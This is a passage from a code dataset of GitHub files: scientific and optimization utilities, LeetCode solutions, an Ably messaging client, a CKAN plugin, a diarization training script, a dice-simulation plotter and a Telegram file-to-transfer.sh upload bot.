BaseMeshAccelerator\nfrom ...triangle_shape import TriangleShape\n\n\nclass BruteforceMeshAccelerator(BaseMeshAccelerator):\n \"\"\"\n BruteforceMeshAccelerator: Software Mesh Accelerator\n \"\"\"\n def __init__(self):\n self.triangles = []\n\n def intersect(self, ro, rd, t0, t1):\n s = self.triangles[0]\n t = t1\n info = s.intersect(ro, rd, t0, t)\n \n b = info['b']\n t = info['t']\n for i in range(1, len(self.triangles)):\n s = self.triangles[i]\n iinfo = s.intersect(ro, rd, t0, t)\n bb = iinfo['b']\n tt = iinfo['t']\n b = b + bb\n t = tt\n for k in iinfo.keys():\n if k in info:\n info[k] = F.where(bb, iinfo[k], info[k])\n else:\n info[k] = iinfo[k]\n info['b'] = b\n info['t'] = t\n return info\n\n def clear(self):\n self.triangles = []\n\n def add_triangle(self, t):\n t = TriangleShape(t.p0, t.p1, t.p2, t.id)\n self.triangles.append(t)\n\n def construct(self):\n pass","repo_name":"ototoi/drt","sub_path":"src/drt/shape/mesh_accelerator/sw/bruteforce_mesh_accelerator.py","file_name":"bruteforce_mesh_accelerator.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"26961787255","text":"\"\"\"\nFollow up for H-Index (leet code 274): What if the citations array is sorted in ascending order? Could you optimize your algorithm?\n\nHide Company Tags Facebook\nHide Tags Binary Search\nHide Similar Problems (M) H-Index\n\n\"\"\"\n\n# MOWN Solution\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n counter = 0\n for i in citations[::-1]:\n counter += 1\n if i >= counter:\n continue\n else:\n break\n else:\n return counter\n return counter -1\n\nclass Solution(object):\n def hIndex(self, citations):\n counter, i = 0, len(citations)-1\n while i >= 0:\n counter += 1\n temp = citations[i]\n i -= 1\n if temp < counter:\n break\n else:\n return counter\n return counter-1\n\n# LUP solution\n# Binary search\nclass Solution(object):\n def hIndex(self, citations):\n low, high, lenc = 0, len(citations) -1, len(citations)\n while low <= high:\n mid = (low+high)/2\n if citations[mid] == lenc - mid:\n return citations[mid]\n\n elif citations[mid] > lenc - mid:\n high = mid - 1\n\n else:\n low = mid + 1\n\n return lenc - low\n","repo_name":"tejamupparaju/LeetCode_Python","sub_path":"leet_code275.py","file_name":"leet_code275.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37858455391","text":"import base64\nfrom collections import OrderedDict\nimport logging\nimport json\nimport os\nfrom typing import Iterator\nfrom urllib import parse\n\nfrom methoddispatch import SingleDispatch, singledispatch\nimport msgpack\n\nfrom ably.http.paginatedresult import PaginatedResult, format_params\nfrom ably.types.channeldetails import ChannelDetails\nfrom ably.types.message import Message, make_message_response_handler\nfrom ably.types.presence import Presence\nfrom ably.util.crypto import get_cipher\nfrom ably.util.exceptions import catch_all, IncompatibleClientIdException\n\nlog = logging.getLogger(__name__)\n\n\nclass Channel(SingleDispatch):\n def __init__(self, ably, name, options):\n self.__ably = ably\n self.__name = name\n self.__base_path = '/channels/%s/' % parse.quote_plus(name, safe=':')\n self.__cipher = None\n self.options = options\n self.__presence = Presence(self)\n\n @catch_all\n async def history(self, direction=None, limit: int = None, start=None, end=None):\n \"\"\"Returns the history for this channel\"\"\"\n params = format_params({}, direction=direction, start=start, end=end, limit=limit)\n path = self.__base_path + 'messages' + params\n\n message_handler = make_message_response_handler(self.__cipher)\n return await PaginatedResult.paginated_query(\n self.ably.http, url=path, response_processor=message_handler)\n\n def __publish_request_body(self, messages):\n \"\"\"\n Helper private method, separated from publish() to test RSL1j\n \"\"\"\n # Idempotent publishing\n if self.ably.options.idempotent_rest_publishing:\n # RSL1k1\n if all(message.id is None for message in messages):\n base_id = base64.b64encode(os.urandom(12)).decode()\n for serial, message in enumerate(messages):\n message.id = '{}:{}'.format(base_id, serial)\n\n request_body_list = []\n for m in messages:\n if m.client_id == '*':\n raise IncompatibleClientIdException(\n 'Wildcard client_id is reserved and cannot be used when publishing messages',\n 400, 40012)\n elif m.client_id is not None and not self.ably.auth.can_assume_client_id(m.client_id):\n raise IncompatibleClientIdException(\n 'Cannot publish with client_id 
\\'{}\\' as it is incompatible with the '\n 'current configured client_id \\'{}\\''.format(m.client_id, self.ably.auth.client_id),\n 400, 40012)\n\n if self.cipher:\n m.encrypt(self.__cipher)\n\n request_body_list.append(m)\n\n request_body = [\n message.as_dict(binary=self.ably.options.use_binary_protocol)\n for message in request_body_list]\n\n if len(request_body) == 1:\n request_body = request_body[0]\n\n return request_body\n\n @singledispatch\n def _publish(self, arg, *args, **kwargs):\n raise TypeError('Unexpected type %s' % type(arg))\n\n @_publish.register(Message)\n async def publish_message(self, message, params=None, timeout=None):\n return await self.publish_messages([message], params, timeout=timeout)\n\n @_publish.register(list)\n async def publish_messages(self, messages, params=None, timeout=None):\n request_body = self.__publish_request_body(messages)\n if not self.ably.options.use_binary_protocol:\n request_body = json.dumps(request_body, separators=(',', ':'))\n else:\n request_body = msgpack.packb(request_body, use_bin_type=True)\n\n path = self.__base_path + 'messages'\n if params:\n params = {k: str(v).lower() if type(v) is bool else v for k, v in params.items()}\n path += '?' + parse.urlencode(params)\n return await self.ably.http.post(path, body=request_body, timeout=timeout)\n\n @_publish.register(str)\n async def publish_name_data(self, name, data, timeout=None):\n messages = [Message(name, data)]\n return await self.publish_messages(messages, timeout=timeout)\n\n async def publish(self, *args, **kwargs):\n \"\"\"Publishes a message on this channel.\n\n :Parameters:\n - `name`: the name for this message.\n - `data`: the data for this message.\n - `messages`: list of `Message` objects to be published.\n - `message`: a single `Message` objet to be published\n\n :attention: You can publish using `name` and `data` OR `messages` OR\n `message`, never all three.\n \"\"\"\n # For backwards compatibility\n if len(args) == 0:\n if len(kwargs) == 0:\n return await self.publish_name_data(None, None)\n\n if 'name' in kwargs or 'data' in kwargs:\n name = kwargs.pop('name', None)\n data = kwargs.pop('data', None)\n return await self.publish_name_data(name, data, **kwargs)\n\n if 'messages' in kwargs:\n messages = kwargs.pop('messages')\n return await self.publish_messages(messages, **kwargs)\n\n return await self._publish(*args, **kwargs)\n\n async def status(self):\n \"\"\"Retrieves current channel active status with no. 
of publishers, subscribers, presence_members etc\"\"\"\n\n path = '/channels/%s' % self.name\n response = await self.ably.http.get(path)\n obj = response.to_native()\n return ChannelDetails.from_dict(obj)\n\n @property\n def ably(self):\n return self.__ably\n\n @property\n def name(self):\n return self.__name\n\n @property\n def base_path(self):\n return self.__base_path\n\n @property\n def cipher(self):\n return self.__cipher\n\n @property\n def options(self):\n return self.__options\n\n @property\n def presence(self):\n return self.__presence\n\n @options.setter\n def options(self, options):\n self.__options = options\n\n if options and 'cipher' in options:\n cipher = options.get('cipher')\n if cipher is not None:\n cipher = get_cipher(cipher)\n self.__cipher = cipher\n\n\nclass Channels:\n def __init__(self, rest):\n self.__ably = rest\n self.__all: dict = OrderedDict()\n\n def get(self, name, **kwargs):\n if isinstance(name, bytes):\n name = name.decode('ascii')\n\n if name not in self.__all:\n result = self.__all[name] = Channel(self.__ably, name, kwargs)\n else:\n result = self.__all[name]\n if len(kwargs) != 0:\n result.options = kwargs\n\n return result\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __getattr__(self, name):\n return self.get(name)\n\n def __contains__(self, item):\n if isinstance(item, Channel):\n name = item.name\n elif isinstance(item, bytes):\n name = item.decode('ascii')\n else:\n name = item\n\n return name in self.__all\n\n def __iter__(self) -> Iterator[str]:\n return iter(self.__all.values())\n\n # RSN4\n def release(self, name: str):\n \"\"\"Releases a Channel object, deleting it, and enabling it to be garbage collected.\n If the channel does not exist, nothing happens.\n\n It also removes any listeners associated with the channel.\n\n Parameters\n ----------\n name: str\n Channel name\n \"\"\"\n\n if name not in self.__all:\n return\n del self.__all[name]\n","repo_name":"ably/ably-python","sub_path":"ably/rest/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"14475237655","text":"import numpy as np\nimport json\nimport os\nfrom smac.callback import Callback\nfrom src.scaler import Scaler\nfrom src.constants import INPUT_SHAPE\n\n\nclass SaveAngleCallback(Callback):\n \"\"\"\n Callback class that saves metrics during the SMAC optimization process.\n\n Attributes:\n - model (Model): An instance of the model to be used for optimization.\n - path (str): Path to the output directory.\n - metrics_dict (Dict[int, Dict[str, Union[float, int]]]): Dictionary storing metrics for each trial.\n - best_p_norm (float): Best observed p_norm value.\n - best_angle (Union[float, None]): Best observed angle corresponding to best_p_norm.\n - trial_counter (int): Keeps track of the number of trials.\n - scaler (Scaler): Instance of Scaler class for scaling operations.\n \"\"\"\n\n def __init__(self, model, path: str) -> None:\n self.metrics_dict = {}\n self.best_p_norm = float('inf')\n self.best_angle = None\n self.trial_counter = 0\n self.scaler = Scaler()\n self.model = model\n self.path = path\n self._load_existing_data()\n super().__init__()\n\n def _load_existing_data(self) -> None:\n file_path = f'smac3_output/{self.path}/metrics.json'\n if os.path.exists(file_path):\n with open(file_path, 'r') as file:\n loaded_data = json.load(file)\n self.trial_counter = max(map(int, loaded_data.keys()))\n self.metrics_dict = 
{int(k): v for k, v in loaded_data.items()}\n self.best_p_norm = self.metrics_dict[self.trial_counter]['best_p_norm']\n self.best_angle = self.metrics_dict[self.trial_counter]['angle_for_best_p_norm']\n\n def on_tell_start(self, smbo, info, value) -> None:\n self.trial_counter += 1\n\n config = info.config\n\n x = []\n for i in range(INPUT_SHAPE[0]):\n x_i = config[f\"{i:02}\"]\n x.append(x_i)\n\n y = self.model.simulate(x).reshape(-1)\n current_angle = float(np.max(y))\n current_p_norm = float(value.cost)\n\n if current_p_norm < self.best_p_norm:\n self.best_p_norm = current_p_norm\n self.best_angle = current_angle\n\n self.metrics_dict[self.trial_counter] = {\n 'angle': current_angle,\n 'p_norm': current_p_norm,\n 'best_p_norm': self.best_p_norm,\n 'angle_for_best_p_norm': self.best_angle\n }\n\n with open(f'smac3_output/{self.path}/metrics.json', 'w') as file:\n json.dump(self.metrics_dict, file, indent=4)\n","repo_name":"eismont21/knowledge-surrogate-opt","sub_path":"src/sbo/save_angle_callback.py","file_name":"save_angle_callback.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71858427281","text":"\nfrom src.common.fitting import *\n\nimport matplotlib.pyplot as plt\n\ndef analyse_back_peak(xs, ys, yerr, threshold, hys, xerr=None, file_name = None,\n title=None, xlabel = None, ylabel=None, upper=None, lower=None):\n #\n # find peak\n #\n if upper is None and lower is None:\n upper = len(xs) - 1\n while ys[upper] < hys * threshold:\n upper = upper - 1\n lower = upper\n while ys[lower] > threshold:\n lower = lower - 1\n opt, cov, chi_sq = do_normal_regression(xs[lower:upper], ys[lower:upper],\n yerr[lower:upper], xErr=xerr[lower:upper] if xerr is not None else None)\n if file_name is not None:\n plot_peak_res(xs, ys, yerr, xerr, lower, upper, file_name, title, xlabel, ylabel, opt, cov, chi_sq)\n return (opt,cov, chi_sq)\n\ndef plot_peak_res(x, y, y_err, x_err, lower, upper, filename, name, x_label, y_label, opt, cov, chi_sq):\n mod = opt[2] * np.exp(-1.0 * (x[lower:upper] - opt[0])**2/(2*opt[1]**2))\n\n print(\"\"\"Gaußfit {}\nmu : {:.3e} \\pm {:3e}\nsigma : {:.3e} \\pm {:.3e} \nhight: : {:.3e} \\pm {:.3e}\nchi_sq : {:.3e} \\n\n\"\"\".format(name, opt[0], np.sqrt(cov[0][0]), opt[1], np.sqrt(cov[1][1]), opt[2],\n np.sqrt(cov[2][2]), chi_sq))\n\n plt.clf()\n plt.close('all')\n plt.figure(figsize=(8,6), dpi=1200)\n ax_plot = plt.subplot2grid((3,1), (0,0), rowspan=2)\n ax_res = plt.subplot2grid((3,1), (2,0), rowspan=1)\n\n ax_plot.errorbar(x, y, xerr=x_err, yerr=y_err, color=\"r\", linewidth = 0,\n markersize=0, marker=\",\", elinewidth=1)\n ax_plot.plot(x[lower:upper], mod);\n\n ax_plot.axvspan(x[lower], x[upper], label=\"selected data\", alpha=0.2)\n\n y_prop_err = np.zeros(len(y_err[lower:upper]))\n if x_err is not None:\n y_prop_err = [ (mod[i + 1] - mod[i])/(x[i+1]-x[i]) * x_err[lower + i] for i in range(len(mod) - 1) ]\n y_prop_err.append((mod[-1] - mod[-2])/(x[upper] - x[upper -1]) * x_err[upper])\n y_prop_err = np.sqrt(np.array(y_prop_err)**2 + y_err[lower:upper]**2)\n\n ax_res.errorbar(x[lower:upper], y[lower:upper]-mod, yerr=y_prop_err, color=\"r\", linewidth = 0,\n markersize=0, marker=\",\", elinewidth=1, capsize=2)\n ax_res.plot(x[lower:upper], np.zeros(len(x[lower:upper])))\n ax_res.set_xlabel(\"Channels\")\n ax_plot.set_ylabel(\"Events\")\n ax_res.set_ylabel(\"Diviation\")\n ax_plot.set_title(name)\n ax_res.grid(True)\n ax_plot.grid(True)\n\n plt.savefig(filename)\n 
plt.clf()\n","repo_name":"Lenni/F_Praktikum","sub_path":"src/common/analyse_peak.py","file_name":"analyse_peak.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43227690101","text":"class Solution(object):\n def superPow(self, a, b):\n \"\"\"\n :type a: int\n :type b: List[int]\n :rtype: int\n \"\"\"\n if len(b) == 1 and b[0] == 0:\n return 1\n\n a %= 1337\n\n c = a\n dct = {1: c}\n for i in range(2, 1338):\n c *= a\n c %= 1337\n if c == a:\n break\n dct[i] = c\n\n den = len(dct)\n dct[0] = dct[i - 1]\n\n pre = 0\n for elem in b:\n pre = (pre * 10 + elem) % den\n\n return dct[pre]\n\n\nprint(Solution().superPow(13, [3, 9, 8, 3, 5, 2, 7, 8, 1, 0, 2, 4]))\n","repo_name":"wufangjie/leetcode","sub_path":"372. Super Pow.py","file_name":"372. Super Pow.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"21242287739","text":"import os\nfrom ckan.plugins import implements, SingletonPlugin\nfrom ckan.plugins import IRoutes\nfrom ckan.config.routing import SubMapper\n\nclass DadosGovBrDatasetView(SingletonPlugin):\n '''The customized dataset view screen.\n '''\n implements(IRoutes, inherit=True)\n\n def before_map(self, map):\n # Default mappings copied from ckan/config/routing.py that we want to preserve.\n with SubMapper(map, controller='package') as m:\n m.connect('/dataset/{action}',\n requirements=dict(action='|'.join([\n 'list',\n 'new',\n 'autocomplete',\n 'search'\n ]))\n )\n m.connect('/dataset/{action}/{id}/{revision}', action='read_ajax',\n requirements=dict(action='|'.join([\n 'read',\n 'edit',\n 'authz',\n 'history',\n ]))\n )\n m.connect('/dataset/{action}/{id}',\n requirements=dict(action='|'.join([\n 'edit',\n 'editresources',\n 'authz',\n 'history',\n 'read_ajax',\n 'history_ajax',\n ]))\n )\n m.connect('/dataset/{id}.{format}', action='read')\n m.connect('/dataset/{id}/resource/{resource_id}', action='resource_read')\n \n # Our new custom mapping.\n map.connect('/dataset/{id}',\n controller='ckanext.dadosgovbr.controllers.package:DadosGovBrDatasetController',\n action='read')\n return map\n\n","repo_name":"dadosgovbr/ckanext-dadosgovbr","sub_path":"ckanext/dadosgovbr/dataset_plugin.py","file_name":"dataset_plugin.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"167630770","text":"#230201026 Ali Görkem Yalçın\n#100000 took 48 minutes\n#10000 takes 26 seconds\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef lcg(modulus, a, c, seed):\n while True:\n seed = (a * seed + c) % modulus\n return seed\n \nlista=[]\nlistb=[]\nlistc=[]\nlistx=[]\n\nlistavga=[]\nlistavgb=[]\nlistavgc=[]\nlistavgx=[]\n\nlistvarx=[]\n\ncount=0\navga=0\navgb=0\navgc=0\navgx=0\n\nwhile count<100000:\n count = count + 1\n a = int(lcg(6,123,343,np.random.rand()))+1\n b = int(lcg(4,154,312,np.random.rand()))+1\n c = int(lcg(2,213,323,np.random.rand()))\n if c == 1:\n c = 1\n elif c == 0:\n c = -1\n x = a + b*c\n avga = ((count-1)*avga + a)/count\n avgb = ((count-1)*avgb + b)/count\n avgc = ((count-1)*avgc + c)/count\n avgx = ((count-1)*avgx + x)/count\n lista.append(a)\n listb.append(b)\n listc.append(c)\n listx.append(x)\n \n varx=0\n u=0\n sum=0\n \n for i in listx:\n u=u+i\n u=u/count\n \n for i in listx:\n sum=sum+((u-i)**2)\n \n if len(listx)==1: #to not get division by 0 error\n varx=0\n 
else:\n varx=sum/(len(listx)-1)\n \n \n listvarx.append(varx)\n listavga.append(avga)\n listavgb.append(avgb)\n listavgc.append(avgc)\n listavgx.append(avgx)\nuser_input=(input(\"Please press\\n 1 for variable a\\n 2 for variable b\\n 3 for variable c\\n 4 for variable x\\n 5 for average of a\\n 6 for average of b\\n 7 for average of c\\n 8 for average of x \\n 9 for variance of x\\n\"))\nif user_input==(\"1\"):\n plt.hist(lista)\nelif user_input==(\"2\"):\n plt.hist(listb)\nelif user_input==(\"3\"):\n plt.hist(listc)\nelif user_input==(\"4\"):\n plt.hist(listx)\nelif user_input==(\"5\"):\n plt.hist(listavga)\nelif user_input==(\"6\"):\n plt.hist(listavgb)\nelif user_input==(\"7\"):\n plt.hist(listavgc)\nelif user_input==(\"8\"):\n plt.hist(listavgx)\nelif user_input==(\"9\"):\n plt.hist(listvarx)","repo_name":"gorkemyalcin/Ceng114","sub_path":"CENG114_HW1_230201206/Plotter.230201026.py","file_name":"Plotter.230201026.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75327458002","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nimport argparse\nimport random\nfrom diarization_dataset import DiarDataset\nimport numpy as np\nimport socket\nfrom model.faster_rcnn.resnet import resnet\nfrom model.utils.config import cfg, cfg_from_file\nfrom utils import train\nimport pickle\n\nnp.set_printoptions(suppress=True)\nprint(socket.gethostname())\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nparser = argparse.ArgumentParser(\n description='Region Proposal Network based Speaker Diarization Training')\nparser.add_argument('exp_dir', type=str,\n help='path of experiment')\nparser.add_argument('train_dir', type=str,\n help='directory for training')\nparser.add_argument('dev_dir', default=None, type=str,\n help='directory for validation')\nparser.add_argument('--cfg_file', default=\"\", type=str,\n help='configure file')\n\n# data process parameters\nparser.add_argument('--rate', default=8000, type=int,\n help='sample rate')\nparser.add_argument('--frame_size', default=512, type=int,\n help='frame size')\nparser.add_argument('--frame_shift', default=80, type=int,\n help='frame shift')\nparser.add_argument('--merge_dis', default=0.0, type=float,\n help='merge two segments if their distance is smaller than merge_dis')\nparser.add_argument('--min_dis', default=0.2, type=float,\n help='minimum length of each segment, discard segments that are too short')\nparser.add_argument('--padded_len', default=20, type=int,\n help='max number of segments in a sample')\n\n# training parameters\nparser.add_argument('--resume', default=None, type=str,\n help='path to latest checkpoint')\nparser.add_argument('--initialize', default=0, type=int,\n help='whether to use checkpoint to initialize model parameters')\nparser.add_argument('--freeze', default=0, type=int,\n help='whether to freeze the model parameters')\nparser.add_argument('--set_bn_fix', default=0, type=int,\n help='whether to set batchnorm fixed')\nparser.add_argument('--pretrain_model', default=None, type=str,\n help='the directory of pretrained model')\nparser.add_argument('--pretrain_resnet_model', default=None, type=str,\n help='the directory of pretrained resnet model')\nparser.add_argument('--epochs', default=10, type=int,\n help='number of total epochs to run')\nparser.add_argument('--batch_size', default=8, type=int,\n help='mini-batch size')\nparser.add_argument('--num_workers', default=0, type=int,\n 
help='number of workers for data loading')\nparser.add_argument('--optimizer', default='sgd', type=str,\n help='optimizer')\nparser.add_argument('--lr', default=0.01, type=float,\n help='initial learning rate')\nparser.add_argument('--scheduler', default='reduce', type=str,\n help='learning rate scheduler')\nparser.add_argument('--min_lr', default=0.0001, type=float, \n help='minimum learning rate')\nparser.add_argument('--patience', default=10, type=int, \n help='patience to reduce learning rate')\nparser.add_argument('--clip', default=5.0, type=float, \n help='gradient clip')\nparser.add_argument('--seed', default=7, type=int,\n help='random seed')\nparser.add_argument('--alpha', default=1.0, type=float,\n help='it seems that the RCNN_loss_cls_spk is dominating \\\n the loss function. So I want to give it a smaller weight')\n\n# network parameters\nparser.add_argument('--arch', default='res101', type=str, \n help='model architecture')\nparser.add_argument('--nclass', default=5963, type=int, \n help='number of classes (5962 speakers and background)')\n\n# validate parameters\nparser.add_argument('--eval_interval', default=20, type=int,\n help='number of epochs to save the model')\nparser.add_argument('--num_dev', default=-1, type=int,\n help='the dev set is too large, just use some of it')\n\n# visualize\nparser.add_argument('--use_tfb', dest='use_tfboard',\n help='whether use tensorboard',\n action='store_true')\n\ndef main():\n global args\n args = parser.parse_args()\n\n # prepare log file\n log_file = open(\"{}/log/train_log\".format(args.exp_dir), 'w')\n log_file.write(\"{}\\n\".format(args))\n\n # set random seed\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # prepare training set and dev set\n train_dataset = DiarDataset(args.train_dir, args.rate, args.frame_size, args.frame_shift, None, args.padded_len, args.merge_dis, args.min_dis)\n dev_dataset = DiarDataset(args.dev_dir, args.rate, args.frame_size, args.frame_shift, None, args.padded_len, args.merge_dis, args.min_dis, args.num_dev)\n\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=True,\n shuffle=True)\n dev_loader = torch.utils.data.DataLoader(dataset=dev_dataset,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=True,\n shuffle=False)\n log_file.write(\"{} TRAIN segments, {} DEV segments\\n\".format(len(train_dataset), len(dev_dataset)))\n\n if args.cfg_file == \"\":\n args.cfg_file = \"cfgs/{}.yml\".format(args.arch)\n log_file.write(\"Using configure file {}\\n\".format(args.cfg_file))\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n\n # save cfg file\n with open('{}/cfg.pkl'.format(args.exp_dir), 'wb') as handle:\n pickle.dump(cfg, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n # initilize the network here.\n start_epoch = 1\n if args.arch == 'res101':\n model = resnet(args.nclass, 101, pretrained=args.pretrain_resnet_model, freeze=args.freeze, set_bn_fix=args.set_bn_fix)\n else:\n raise ValueError(\"Network is not supported\")\n model.create_architecture()\n model = model.to(device)\n\n if args.pretrain_model is not None:\n log_file.write(\"Loading pretrained weights from {}\\n\".format(args.pretrain_model))\n checkpoint = torch.load(args.pretrain_model)\n pretrained_dict = checkpoint['model'] \n model_dict = model.state_dict()\n pretrained_dict_new = {}\n para_list = 
[]\n for k, v in pretrained_dict.items():\n assert k in model_dict\n if model_dict[k].size() == pretrained_dict[k].size():\n pretrained_dict_new[k] = v\n else:\n para_list.append(k)\n log_file.write(\"Total {} parameters, Loaded {} parameters\\n\".format(len(pretrained_dict), len(pretrained_dict_new)))\n log_file.write(\"Not loading {} because of different sizes\\n\".format(\", \".join(para_list)))\n model_dict.update(pretrained_dict_new) \n model.load_state_dict(model_dict)\n log_file.write(\"Loaded checkpoint '{}' (epoch {} iter {})\\n\".format(args.pretrain_model, checkpoint['epoch'], checkpoint['iter']))\n log_file.write(\"Best score {}\\n\".format(checkpoint['best_score']))\n\n params = []\n for key, value in dict(model.named_parameters()).items():\n if value.requires_grad:\n if 'bias' in key:\n params += [{'params':[value],'lr':args.lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \\\n 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]\n else:\n params += [{'params':[value],'lr':args.lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]\n\n # define optimizer\n if args.optimizer == 'adam':\n optimizer = torch.optim.Adam(params)\n elif args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(params, momentum=0.9)\n else:\n raise ValueError(\"Optimizer type not defined.\")\n\n start_epoch, start_iter, best_score = 1, 1, float('inf')\n # load parameters\n if args.resume is not None:\n if os.path.isfile(args.resume):\n log_file.write(\"Loading checkpoint '{}'\\n\".format(args.resume))\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['model'])\n if not args.initialize:\n optimizer.load_state_dict(checkpoint['optimizer'])\n start_epoch = checkpoint['epoch']\n start_iter = checkpoint['iter'] + 1\n if start_iter > len(train_loader):\n start_epoch += 1\n start_iter = 1 \n\n log_file.write(\"Loaded checkpoint '{}' (epoch {} iter {})\\n\"\n .format(args.resume, checkpoint['epoch'], checkpoint['iter']))\n log_file.write(\"Best score {:.4f}\\n\".format(checkpoint['best_score']))\n else:\n raise ValueError(\"=> No checkpoint found at '{}'\".format(args.resume))\n log_file.flush()\n\n # use tensorboard to monitor the loss\n if args.use_tfboard:\n from tensorboardX import SummaryWriter\n logger = SummaryWriter(\"{}/log\".format(args.exp_dir))\n else:\n logger = None\n\n args.start_epoch, args.start_iter, args.best_score = start_epoch, start_iter, best_score\n # train\n train(train_loader, dev_loader, model, device, optimizer, logger, log_file, args)\n\n if args.use_tfboard:\n logger.close()\n log_file.close()\n return 0\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"HuangZiliAndy/RPNSD","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"3"} +{"seq_id":"9992102483","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# (c) Shrimadhav U K\r\n\r\n\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n\r\nimport aiohttp\r\nimport uuid\r\nimport re\r\nimport json\r\nfrom datetime import datetime\r\n\r\nimport os\r\nimport subprocess\r\nimport time\r\nimport asyncio\r\nfrom tools.config import Config\r\nfrom tools.progress import progress_for_pyrogram, humanbytes\r\nfrom tools.translation import Translation\r\nimport pyrogram\r\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\r\nusers = 
[]\r\n\r\n\r\n@pyrogram.Client.on_message()\r\nasync def get_link(bot, update):\r\n if str(update.from_user.id) in Config.BANNED_USERS:\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.ABUSIVE_USERS,\r\n reply_to_message_id=update.message_id,\r\n disable_web_page_preview=True,\r\n parse_mode=\"html\"\r\n )\r\n return\r\n elif update.text == \"/start\":\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.START_TEXT,\r\n reply_to_message_id=update.message_id\r\n )\r\n return\r\n elif update.text == \"/help\" or update.text == \"/about\":\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.HELP_USER,\r\n parse_mode=\"html\",\r\n disable_web_page_preview=True,\r\n reply_to_message_id=update.message_id\r\n )\r\n return\r\n elif update.document is not None or update.video is not None or update.photo is not None or update.audio is not None or update.animation is not None or update.voice is not None or update.sticker is not None or update.video_note is not None:\r\n reply_message = update\r\n else:\r\n return\r\n if update.from_user.id not in users:\r\n users.append(update.from_user.id)\r\n #else:\r\n #await bot.send_message(\r\n #chat_id=update.chat.id,\r\n #text=Translation.ABS_TEXT,\r\n #reply_to_message_id=update.message_id\r\n #)\r\n #return\r\n download_location = Config.DOWNLOAD_LOCATION + \"/\" + str(update.from_user.id) + \"/\"\r\n a = await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.DOWNLOAD_START,\r\n reply_to_message_id=update.message_id\r\n )\r\n c_time = time.time()\r\n after_download_file_name = await bot.download_media(\r\n message=reply_message,\r\n file_name=download_location,\r\n progress=progress_for_pyrogram,\r\n progress_args=(\r\n bot,\r\n Translation.DOWNLOADING,\r\n a.message_id,\r\n update.chat.id,\r\n c_time\r\n )\r\n )\r\n '''await bot.edit_message_text(\r\n text='📤 Uploading file...',\r\n chat_id=update.chat.id,\r\n message_id=a.message_id\r\n )'''\r\n \r\n filesize = os.path.getsize(after_download_file_name)\r\n filename = os.path.basename(after_download_file_name)\r\n download_extension = after_download_file_name.rsplit(\".\", 1)[-1]\r\n end_one = datetime.now()\r\n url = \"https://transfer.sh/{}\".format(str(filename))\r\n max_days = \"5\"\r\n command_to_exec = [\r\n \"curl\",\r\n # \"-H\", 'Max-Downloads: 1',\r\n \"-H\", 'Max-Days: 5', # + max_days + '',\r\n \"--upload-file\", after_download_file_name,\r\n url\r\n ]\r\n await bot.edit_message_text(\r\n text=Translation.UPLOAD_START,\r\n chat_id=update.chat.id,\r\n message_id=a.message_id\r\n )\r\n try:\r\n logger.info(command_to_exec)\r\n t_response = subprocess.check_output(command_to_exec, stderr=subprocess.STDOUT)\r\n except subprocess.CalledProcessError as exc:\r\n logger.info(\"Status : FAIL\", exc.returncode, exc.output)\r\n await bot.edit_message_text(\r\n chat_id=update.chat.id,\r\n text=exc.output.decode(\"UTF-8\"),\r\n message_id=a.message_id\r\n )\r\n return False\r\n else:\r\n logger.info(t_response)\r\n t_response_arry = t_response.decode(\"UTF-8\").split(\"\\n\")[-1].strip()\r\n await bot.edit_message_text(\r\n chat_id=update.chat.id,\r\n text=Translation.AFTER_GET_DL_LINK.format(\r\n filename,\r\n await humanbytes(filesize),\r\n 